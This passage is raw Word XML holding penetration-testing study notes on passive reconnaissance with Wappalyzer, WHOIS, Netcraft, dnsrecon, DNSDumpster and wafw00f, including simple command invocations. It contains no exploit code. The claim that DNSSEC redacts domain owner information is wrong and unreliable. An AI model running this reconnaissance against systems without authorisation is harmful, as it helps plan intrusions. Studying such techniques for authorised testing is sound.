        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Wappalyzer – Identifies web technologies on websites, relatively quick and provides brief info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172408FC" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F683D27" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WhoIs Enumeration – An internet protocol, essentially a query and response protocol that is widely used for querying databases. Used for internet resources for the following types of information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFEF0F6" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6EE782" w14:textId="14B43054" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="006C1146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Domain names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B42D69" w14:textId="4C06E6D5" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="006C1146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>IP Address blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233EDE0D" w14:textId="6C9BE23C" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="006C1146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Autonomous systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD96872" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WhoIs has a web interface as well as a command-line utility on Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888C171" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1171F8B3" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>It can be used to enumerate domain/registrar information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5EAD0A" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>There are plenty of information in relation to the name servers, emails, phone numbers, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37213372" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS Sec: If it is enabled, information about the owner of the domain will be redacted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002E375" w14:textId="4C8EA632" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DCD299" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Web Footprinting w/ Netcraft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37882248" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFE0811" w14:textId="7BCB97E2" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Netcraft essentially collects all information including the WhoIs info, nameservers, TLS/SSL certificates, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88707C" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5005B7" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Netcraft will provide a lot of information regarding the host, however the best information for a penetration tester from all of these results is the network information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7E796" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>IP address, domain name, Top Level Domain, DNS security extensions, IP delegation (for IP blocks), TLS/SSL certificate(relevant for SSL cert expiration dates and whether or not its valid or transparent), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C68D7" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Web technologies are also accessible on the client and server side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CEE9FA" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>* Wordpress generally is running MariaDB or MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238FDA7C" w14:textId="1C55B63C" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD98B8" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS Recon – Passive Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498A43B" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372D91EF" w14:textId="2C3447B5" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>dnsrecon – A python script that provides the ability to perform</w:t>
      </w:r>
      <w:r w:rsidR="00B56195">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>; Check all name system records for Zone Transfers. Enumerate General DNS records for a given Domain (MX, SOA, NS, A, AAAA, SPF, and TXT). Performs common SRV Record Enumeration, Top Level Domain (TLD) Expansion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43295D94" w14:textId="2912D9B3" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>dnsrecon has both a web interface and a Kali command-line interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F7CC69" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“dnsrecon -d (DOMAIN NAME)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169A339" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA79BB2" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>We are essentially trying to look for the name servers addresses, and any other records that follow the General DNS record formats listed above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CDB46" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Proxies can tend to mislead some of the NS addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7944DD93" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>MX records are important to look at, for example: CloudFlare doesn’t proxy its mail servers very well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F545BD" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>It will also display if DNS Security is enabled/configured or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19814EE3" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>*A* record: IP address of actual site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC0B2C" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>TXT and MX are for diagnostic and mail information respectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B681E23" w14:textId="56404C75" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645931CE" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNSDumpster – Web interface that performs DNS recon and research, performing a lookup on records however it organizes and sorts information much better than dnsrecon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD886E0" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29BB0D74" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Contains records similar to the DNS record types listed in the DNSRecon section (ex: MX, TXT, A, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFD8F6" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Includes a graphical OSINT mapping infrastructure that maps the domain connections between a way that is understandable, points the different record types to their absolute name systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D330338" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hierarchical view + domain mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F4F0BE" w14:textId="3B727771" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Need to research more into this; could be beneficial for CPTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C4887C" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B4C042" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WAF (Web Application Firewalls) Detection with wafw00f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68407B31" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC2F121" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sends a normal HTTP request and analyzes the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA928CD" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Analyzes the response and identifies solutions (whether the web app is being protected by a firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C88C5C4" w14:textId="06D48AFD" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tells you about the firewall as well, not just that its protected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617DC40" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wafw00f comes pre-packaged with Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C697151" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“wafw00f (ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D2A1D" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>You want to know that if the website is being protected by a WAF to strategize what the next steps are and allow you to target the correct address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B54D69" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If a WAF is not detected on a potential critical website or webspace, that could mean it is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D679BCD" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Allows you to test for multiple WAF instances instead of just individually (“-a” parameter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0B541" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If wafw00f spits back that it seems to be behind a WAF or security solution, we will need to detect the firewall with active recon.</w:t>
      </w:r>
